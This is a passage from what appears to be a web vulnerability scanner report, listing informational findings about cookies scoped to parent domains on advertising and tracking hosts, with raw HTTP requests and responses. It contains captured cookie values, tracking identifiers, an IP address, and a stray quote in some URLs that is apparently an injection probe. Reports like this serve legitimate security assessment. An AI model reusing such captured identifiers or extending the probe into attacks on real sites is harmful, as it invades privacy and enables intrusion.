Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; segments="3391|3392|11262|11265|30353|17277|38781|38582,1298044270|40657|10102"; dp_rec="{\"3\": 1296072684+ \"2\": 1296508071}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 02 Feb 2011 15:13:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 02-Feb-2011 15:13:28 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
Set-Cookie: impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
Set-Cookie: frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:48 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.262. http://tags.bluekai.com/site/1463 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/1463

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=VjPsezUR22QsHNJo; expires=Mon, 01-Aug-2011 15:43:39 GMT; path=/; domain=.bluekai.com
bkc=KJh5N1+nsNWDOFeFJLjUW3hAGVtJQ3to5SmQGaSLYufDx3hYXPsAV+u9YNazaSosWOcHggrEaiGrOOPzvsNNW4ynOaKbWDoOWccM9XEcwjBf8lgrjGR4X86fypZct4/Orpl9b+4Vr9YyJ5lZ8IfB1wbqYtuAQ11Fh71klJEUposZINhCLIBP24yZ2egrxtiSUednFqkowYunkFmOoKRZo8fX0pv5o8tukdP7ymhWR20ntpp0ZZUvShzaQK8uQKNAPcGkklyS9Ewk+q2J5NxnH1jMXx9vxWbDzkBKK0GqXJDJaWFE28WlHLsXjo73+HKp6gbxd4eQq/ezI/AfSMAXSqyLjdAZVIeIo1W8MNhgZzfUkrlc3wudHhbtls+jMLBNxrfnxHKy4NE7rMe/E4USyxOy26HQnN7MIi3EZdnSctHd0AK9Au7M1LrDNI8Dld+KmS7KwIRNfgBXlVlzT6l7dlC38wy2MZ4YleI3rc2SdCQHgLdPdC2f6rKEtdlzlQFrhupCmAdBbdYHlNPhdfdAeM6UgMIgdqdfUu7l/ItkOVmGdHt3vc408BQX2XanyqyETUfbigLI0+Nim5hF7an2KjWGz4lVphN/s5wdJEqBwEMeF4F5I9WLRBHj; expires=Mon, 01-Aug-2011 15:43:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/1463?ret=pp&_bkt=3&_bks=RMDhBtDtjMQ= HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bk=4uX9rLUR22QsHNJo; bkc=KJh5N1+nsNWDOFeFJAqEwnYuHVNnacpWN/tYxZpaZrOYVyCPvaja+vDNTW/DP0b3WDHWNcPlGxUaHzWvqLu3i2YdGmevqQxHYin5I9eHKLdAlgZKr87Chlp7pcerRURexaWKmJhbkHR953DU3gQciTy4uBB2GqpEXU4Ndeg0nmNejJqzmLI2+VDX/GFV0GOzjT5EENbNEwt6Xdn0TyAydfA2fzPBvU7e1rVNvXJ9Ubl95MRoFHTQ7Xq9Ec7+aKZKjGcRjYG5yimx1fUzkBKKXxmIrWYkBc64KU1zpOrV3P8frSEQzpAweXTIA+rcrJmVG2wsS6cQCPdQd2XtohI8hEnNN8qMhfM6XEtwVCb6n/de5zRccnye4F28fgGXpWlNtrWxzw+xTaztT430ZJF0tZdk4mgcQnWjTfCk0ZFl3r22G8hPf8dysQ2qFrGpfFzVXMX2YU7IcL5pDKbFE5p4n9dWCm+dSFIww/UI8mTQ+dKzKfkWrY8P8lPTpbIqrWXrrYBwCKLwSF2F5hgk4CuzVpvst+IHC7G7E6T+zCdDYmS2sw4MmrfVJcKU8KCfTf0SElVZ0FUn/czGq6pdk2xL2bz8fF6Fh75PN1LK; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqvSDo92HK9b+AjuFm0XdnnXl0RpRaYcTOYyQyZOiRZHZRVOARZoCSskrjZhARVe8k96FpzRBF9qa2rJBtfyD/+ZWJnQDnue1bmgLsrgrsIdQPKlrqrXuckKPsPHKVKrAUOJF24tQvPX4v9fEDl1pYhBnv6+ex0BnRy1exlBM8uepJaMoKOQRzClz6NtSr36eAgyiFgypX7GcQFDa0eGEypJPfUWmQpYyBEWNwMKJ1DW6Bp/01MulmMoWxEwVOQZJoSVagRg0Nl29D9mRNJwQ==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 15:43:39 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=VjPsezUR22QsHNJo; expires=Mon, 01-Aug-2011 15:43:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5N1+nsNWDOFeFJLjUW3hAGVtJQ3to5SmQGaSLYufDx3hYXPsAV+u9YNazaSosWOcHggrEaiGrOOPzvsNNW4ynOaKbWDoOWccM9XEcwjBf8lgrjGR4X86fypZct4/Orpl9b+4Vr9YyJ5lZ8IfB1wbqYtuAQ11Fh71klJEUposZINhCLIBP24yZ2egrxtiSUednFqkowYunkFmOoKRZo8fX0pv5o8tukdP7ymhWR20ntpp0ZZUvShzaQK8uQKNAPcGkklyS9Ewk+q2J5NxnH1jMXx9vxWbDzkBKK0GqXJDJaWFE28WlHLsXjo73+HKp6gbxd4eQq/ezI/AfSMAXSqyLjdAZVIeIo1W8MNhgZzfUkrlc3wudHhbtls+jMLBNxrfnxHKy4NE7rMe/E4USyxOy26HQnN7MIi3EZdnSctHd0AK9Au7M1LrDNI8Dld+KmS7KwIRNfgBXlVlzT6l7dlC38wy2MZ4YleI3rc2SdCQHgLdPdC2f6rKEtdlzlQFrhupCmAdBbdYHlNPhdfdAeM6UgMIgdqdfUu7l/ItkOVmGdHt3vc408BQX2XanyqyETUfbigLI0+Nim5hF7an2KjWGz4lVphN/s5wdJEqBwEMeF4F5I9WLRBHj; expires=Mon, 01-Aug-2011 15:43:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 03-Feb-2011 15:43:39 GMT; path=/; domain=.bluekai.com
BK-Server: a96f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

11.263. http://tags.bluekai.com/site/2748 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2748

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=4uX9rLUR22QsHNJo; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com
bkc=KJh5N1+nsNWDOFeFJAqEwnYuHVNnacpWN/tYxZpaZrOYVyCPvaja+vDNTW/DP0b3WDHWNcPlGxUaHzWvqLu3i2YdGmevqQxHYin5I9eHKLdAlgZKr87Chlp7pcerRURexaWKmJhbkHR953DU3gQciTy4uBB2GqpEXU4Ndeg0nmNejJqzmLI2+VDX/GFV0GOzjT5EENbNEwt6Xdn0TyAydfA2fzPBvU7e1rVNvXJ9Ubl95MRoFHTQ7Xq9Ec7+aKZKjGcRjYG5yimx1fUzkBKKXxmIrWYkBc64KU1zpOrV3P8frSEQzpAweXTIA+rcrJmVG2wsS6cQCPdQd2XtohI8hEnNN8qMhfM6XEtwVCb6n/de5zRccnye4F28fgGXpWlNtrWxzw+xTaztT430ZJF0tZdk4mgcQnWjTfCk0ZFl3r22G8hPf8dysQ2qFrGpfFzVXMX2YU7IcL5pDKbFE5p4n9dWCm+dSFIww/UI8mTQ+dKzKfkWrY8P8lPTpbIqrWXrrYBwCKLwSF2F5hgk4CuzVpvst+IHC7G7E6T+zCdDYmS2sw4MmrfVJcKU8KCfTf0SElVZ0FUn/czGq6pdk2xL2bz8fF6Fh75PN1LK; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqvSDo92HK9b+AjuFm0XdnnXl0RpRaYcTOYyQyZOiRZHZRVOARZoCSskrjZhARVe8k96FpzRBF9qa2rJBtfyD/+ZWJnQDnue1bmgLsrgrsIdQPKlrqrXuckKPsPHKVKrAUOJF24tQvPX4v9fEDl1pYhBnv6+ex0BnRy1exlBM8uepJaMoKOQRzClz6NtSr36eAgyiFgypX7GcQFDa0eGEypJPfUWmQpYyBEWNwMKJ1DW6Bp/01MulmMoWxEwVOQZJoSVagRg0Nl29D9mRNJwQ==; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2748?redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID%3D84%26partnerUID%3D%24_BK_UUID%26sscs_active%3D1 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=219
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwk/w1AVmkTsOC0c5pEUj3bgxmuFYvIFew0KQKY2xU/mCwe1kU+zxbe1n9N1EDIBTAhxExl1M/0BnzbmAHO12RsYRZkoRV+iFnU46Ox9unDSn; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bk=tkrgLXUR22QsHNJo; bkc=KJh56XInDkWDOdeFNVpXix6rhQo7GB/hByDmVWZo+c9/o9ZinvHoZOHZ1Hi+jNxxizMVfSxQSHaRTYRSoGU1UhYT3A6yOWaWs0LRhggc2IBbfrRIw7emK4K5z8fcYyQ9MXw89MlnXrMm9olXP5rFBJKmv9dAX4RW6BgvaJyTeJJfZi7KXCrFTRwxtR/nGxR8lKnr28U7969hvFYI7oU8gflAcpWyDplnpbHFn97WcrDv4L0OU/k0DfpkZC+yhxDVomkf0mI3Rm8oo7pnfH7e/lk4OlbrApwlrnmS/2FvUH2y0ulyfdFkuEl0OzNDlfJLebguINwK6apun157rI/YCgKOENXrtQTcrY74zL9wM/XJfBPE+FXz8SjT0p5k4hvqysjBmSbjTil41r2flUE54w2eodv38g2a8E+m/lfcAjnp56pzMcYducvdNcylJZpd1F4p3XmGENfhzE+clm6jRE+GprFpkvXkrqd28Qb5anqUpw2kdmsXl9de7S4v1wKl4YThiu47779wpyMZlHMlXDUr5JjfVUwAFFn9f1do0i7qPlpzdGs0HpgUTcfx8wfTUwAd0kEOwy==

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 02 Feb 2011 15:31:39 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Location: http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=84&partnerUID=DTQke7T999Y4qYJB&sscs_active=1
Set-Cookie: bk=4uX9rLUR22QsHNJo; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5N1+nsNWDOFeFJAqEwnYuHVNnacpWN/tYxZpaZrOYVyCPvaja+vDNTW/DP0b3WDHWNcPlGxUaHzWvqLu3i2YdGmevqQxHYin5I9eHKLdAlgZKr87Chlp7pcerRURexaWKmJhbkHR953DU3gQciTy4uBB2GqpEXU4Ndeg0nmNejJqzmLI2+VDX/GFV0GOzjT5EENbNEwt6Xdn0TyAydfA2fzPBvU7e1rVNvXJ9Ubl95MRoFHTQ7Xq9Ec7+aKZKjGcRjYG5yimx1fUzkBKKXxmIrWYkBc64KU1zpOrV3P8frSEQzpAweXTIA+rcrJmVG2wsS6cQCPdQd2XtohI8hEnNN8qMhfM6XEtwVCb6n/de5zRccnye4F28fgGXpWlNtrWxzw+xTaztT430ZJF0tZdk4mgcQnWjTfCk0ZFl3r22G8hPf8dysQ2qFrGpfFzVXMX2YU7IcL5pDKbFE5p4n9dWCm+dSFIww/UI8mTQ+dKzKfkWrY8P8lPTpbIqrWXrrYBwCKLwSF2F5hgk4CuzVpvst+IHC7G7E6T+zCdDYmS2sw4MmrfVJcKU8KCfTf0SElVZ0FUn/czGq6pdk2xL2bz8fF6Fh75PN1LK; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqvSDo92HK9b+AjuFm0XdnnXl0RpRaYcTOYyQyZOiRZHZRVOARZoCSskrjZhARVe8k96FpzRBF9qa2rJBtfyD/+ZWJnQDnue1bmgLsrgrsIdQPKlrqrXuckKPsPHKVKrAUOJF24tQvPX4v9fEDl1pYhBnv6+ex0BnRy1exlBM8uepJaMoKOQRzClz6NtSr36eAgyiFgypX7GcQFDa0eGEypJPfUWmQpYyBEWNwMKJ1DW6Bp/01MulmMoWxEwVOQZJoSVagRg0Nl29D9mRNJwQ==; expires=Mon, 01-Aug-2011 15:31:39 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 03-Feb-2011 15:31:39 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 0
Content-Type: text/html
Connection: keep-alive

11.264. http://track.roiservice.com/track/track.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.roiservice.com
Path:	/track/track.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

msid936138107000019=a2cc436f07764ff0bdfc512bb07215f0; domain=.roiservice.com; expires=Sat, 01-Feb-2031 15:25:53 GMT; path=/
GTT936138107000019=a2cc436f07764ff0bdfc512bb07215f0; domain=.roiservice.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/track.aspx?ROIID=936138107000019 HTTP/1.1
Host: track.roiservice.com
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: msid938956107000029=06dd214c75b14fd39004a5e41502868d

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:25:53 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: msid936138107000019=a2cc436f07764ff0bdfc512bb07215f0; domain=.roiservice.com; expires=Sat, 01-Feb-2031 15:25:53 GMT; path=/
Set-Cookie: GTT936138107000019=a2cc436f07764ff0bdfc512bb07215f0; domain=.roiservice.com; path=/
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 1628

var ROIID='936138107000019';var sn = 'a2cc436f07764ff0bdfc512bb07215f0';var dm=null;var gt_url = '';var gt_cid= '';var xDate=new Date();xDate.setFullYear(xDate.getFullYear() + 1);function au(nm, vl){g
...[SNIP]...

11.265. http://tracking.tree.com/trk/npv-event.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.tree.com
Path:	/trk/npv-event.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=3E5A3F6BE25E0C21; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tree.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trk/npv-event.gif?Log=1&dt=1296661472896&ns=tree&type=NPV&eventCat=Fossa&eventAction=view&eventLabel=undefined%3Aundefined&eventValue=&screen=1920x1200-16&version=0.9&url=http%3A%2F%2Foffers.lendingtree.com%2Fsplitter%2Fsplitter.ashx%3Fid%3Dmsnhptext12111%26promo%3D00313%26source%3D4666360%26esourceid%3D4666360%26800Num%3D1-800-289-1731'%26adtype%3D2&sn=serverName&_tsid=5d91cf81-64dd-4122-b722-209783712fb4&_tcid=99ececb2-b7d7-493d-8c9a-dc1b0ea28b4b&author=unset&partnerkey=&convid=&isconv=false&ip=173.193.214.243&convname= HTTP/1.1
Host: tracking.tree.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_lftm=v=1&id=suzsmde3PUmMmtwbDqKLSw--&bd=2011-02-02 15:43:54Z; t_svis=rfr=http%3a%2f%2foffers.lendingtree.com%2fsplitter%2fsplitter.ashx%3fid%3dmsnhptext12111%26promo%3d00313%26source%3d4666360%26esourceid%3d4666360%26800Num%3d1-800-289-1731%27%26adtype%3d2&adpk=&adcc=&adcm=&adcn=&adct=&adpxl=&adtype=2&id=gc+RXd1kIkG3IiCXg3EvtA--&v=4&cnt=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private,no-cache=Set-Cookie
Pragma: no-cache
Content-Type: image/gif
Expires: Thu, 28 May 2009 00:00:00 GMT,Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 23 Apr 2009 20:07:22 GMT
Accept-Ranges: bytes
ETag: "039b71c4fc4c91:0"
Vary: *
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Set-Cookie: v1st=3E5A3F6BE25E0C21; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tree.com
Date: Wed, 02 Feb 2011 15:43:41 GMT
Content-Length: 35

GIF89a.............,...........D..;

11.266. http://tracking.tree.com/trk/pv.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.tree.com
Path:	/trk/pv.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=717B790BCEF95430; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tree.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trk/pv.gif?Log=1&dt=1296661472842&ns=tree&pageName=Fossa%3ALP%3Aundefined%3Aundefined&referrer=http%3A%2F%2Fburp%2Fshow%2F13&type=PV&status=200&dns=offers.lendingtree.com&uristem=%2Fsplitter%2Fsplitter.ashx&screen=1920x1200-16&lng=en-US&version=0.9&url=http%3A%2F%2Foffers.lendingtree.com%2Fsplitter%2Fsplitter.ashx%3Fid%3Dmsnhptext12111%26promo%3D00313%26source%3D4666360%26esourceid%3D4666360%26800Num%3D1-800-289-1731'%26adtype%3D2&sn=serverName&_tsid=5d91cf81-64dd-4122-b722-209783712fb4&_tcid=99ececb2-b7d7-493d-8c9a-dc1b0ea28b4b&author=unset HTTP/1.1
Host: tracking.tree.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_lftm=v=1&id=suzsmde3PUmMmtwbDqKLSw--&bd=2011-02-02 15:43:54Z; t_svis=rfr=http%3a%2f%2foffers.lendingtree.com%2fsplitter%2fsplitter.ashx%3fid%3dmsnhptext12111%26promo%3d00313%26source%3d4666360%26esourceid%3d4666360%26800Num%3d1-800-289-1731%27%26adtype%3d2&adpk=&adcc=&adcm=&adcn=&adct=&adpxl=&adtype=2&id=gc+RXd1kIkG3IiCXg3EvtA--&v=4&cnt=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private,no-cache=Set-Cookie
Pragma: no-cache
Content-Type: image/gif
Expires: Thu, 28 May 2009 00:00:00 GMT,Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Thu, 23 Apr 2009 20:07:22 GMT
Accept-Ranges: bytes
ETag: "039b71c4fc4c91:0"
Vary: *
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Set-Cookie: v1st=717B790BCEF95430; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tree.com
Date: Wed, 02 Feb 2011 15:43:41 GMT
Content-Length: 35

GIF89a.............,...........D..;

11.267. http://translate.google.com/translate_t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/translate_t

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=11a27dc8823c6265:TM=1296661338:LM=1296661338:S=XxDI3af9TXnEOKKO; expires=Fri, 01-Feb-2013 15:42:18 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.268. http://tv.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=61adeaebc4c947bc9a31ca64a303644c; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.269. http://tv.msn.com/last-night-on-tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/last-night-on-tv/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=6e26d8f6fa754507a302411667b60080; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /last-night-on-tv/ HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.270. http://tv.msn.com/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/tv/article.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=6b7d0b077d554fe08ea1d656868ae58a; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/article.aspx?news=625989&gt1=28103 HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.271. http://video.google.com/videosearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.google.com
Path:	/videosearch

Issue detail

